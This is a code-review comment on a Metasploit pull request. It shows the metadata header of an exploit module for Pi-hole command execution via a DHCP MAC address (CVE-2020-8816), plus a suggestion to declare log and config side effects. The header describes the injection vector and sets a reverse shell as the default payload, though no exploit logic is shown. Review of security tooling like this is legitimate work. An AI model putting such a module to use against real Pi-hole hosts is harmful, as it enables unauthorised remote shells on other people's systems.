modules/exploits/unix/http/pihole_dhcp_mac_exec.rb

```diff
@@ -0,0 +1,255 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Pi-Hole DHCP MAC OS Command Execution',
+        'Description' => %q{
+          This exploits a command execution in Pi-Hole <= 4.3.2.  A new DHCP static lease is added
+          with a MAC address which includes an RCE.  Exploitation requires /opt/pihole to be first
+          in the $PATH due to exploitation constraints.  DHCP server is not required to be running.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'h00die', # msf module
+            'nateksec' # original PoC, discovery
+          ],
+        'References' =>
+          [
+            ['URL', 'https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/'],
+            ['CVE', '2020-8816']
+          ],
+        'Platform' => ['unix'],
+        'Privileged' => false,
+        'Arch' => ARCH_CMD,
+        'Targets' =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DisclosureDate' => 'Mar 28 2020',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse'
+        },
+        'Payload' => {
+          'BadChars' => "\x00"
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION]
```

Comment:
https://github.com/rapid7/metasploit-framework/pull/13470#issuecomment-630238856

```suggestion
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
```